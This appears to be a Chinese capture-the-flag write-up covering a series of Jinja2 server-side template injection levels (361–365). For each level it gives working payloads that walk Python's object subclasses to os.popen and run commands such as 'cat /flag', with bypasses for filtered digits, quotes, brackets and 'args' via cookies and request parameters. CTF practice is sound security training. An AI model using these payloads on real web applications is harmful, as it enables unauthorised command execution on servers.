361
提示“名字就是考点”
传参点name
-
获取字符串的类:
"".__class__
得到
str
的类对象。 -
获取基类:
"".__class__.__bases__[0]
这会得到
str
类的基类列表,其中第一个元素是object
类。 -
获取
object
类的所有子类:
"".__class__.__bases__[0].__subclasses__()
返回一个包含Python中所有类的列表,这些类都是直接或间接从
object
继承的。 -
选择特定的子类:
"".__class__.__bases__[0].__subclasses__()[132]
选择了列表中的第133个元素(因为索引是从0开始的)。
-
访问
Popen
类的初始化方法的全局变量:"".__class__.__bases__[0].__subclasses__()[132].__init__.__globals__
通过访问
Popen
类的__init__
方法的__globals__
属性,可以获得一个字典,其中包含Popen
类定义时可用的所有全局变量。 -
调用
popen
:"".__class__.__bases__[0].__subclasses__()[132].__init__.__globals__['popen']
从全局变量字典中获取名为
popen
的变量 -
执行系统命令:
"".__class__.__bases__[0].__subclasses__()[132].__init__.__globals__['popen']('cat /flag')
使用
Popen
类来执行cat /flag
命令,这个命令通常用于读取名为flag
的文件。 -
读取命令输出:
调用
read()
方法来读取Popen
对象的输出,即cat /flag
命令的输出。
payload
"".__class__.__bases__[0].__subclasses__()[132].__init__.__globals__['popen']('cat /flag').read()
362
传参试试
轮流试试每个数字,发现只有2和3被过滤
而且只要字符串不包括2和3就能显示
使用全角数字进行绕过
关闭使用半角输入模式
“1234567890”
payload:
?name={{"".__class__.__bases__[0].__subclasses__()[132].__init__.__globals__['popen']('cat /flag').read()}}
363
数字没有被过滤掉
经过各种字母和符号尝试,发现会过滤“”
试试把“”进行url编码看看
还是会被过滤
但是传参会自动补齐双引号,所以索性不加了
?name={{x.__init__.__globals__[request.args.a].eval(request.args.b)}}&a=__builtins__&b=__import__('os').popen('cat /flag').read()
364
它将arg过滤掉了,所以没有办法直接GET传参
改用Cookie传
GET传参
?name={{x.__init__.__globals__[request.cookies.x1].eval(request.cookies.x2)}}
Cookie:
x1=__builtins__;x2=__import__('os').popen('cat /flag').read()
365
尝试Jinja2模板注入
过滤单双引号、[、args
找一下os
{{x.__class__.__bases__.__getitem__(0).__subclasses__()}}
在页面内查找
数出来是132
用__getitem__
绕过中括号[
过滤,request对象
绕过引号''
、""
过滤,cookie
或者values
绕过args
过滤
得到:
{{x.__class__.__bases__.__getitem__(0).__subclasses__().__getitem__(132).__init__.__globals__.popen(request.cookies.x).read()}}
还有Cookie传参
x=ls /
再传
Cookie:x=tac /f*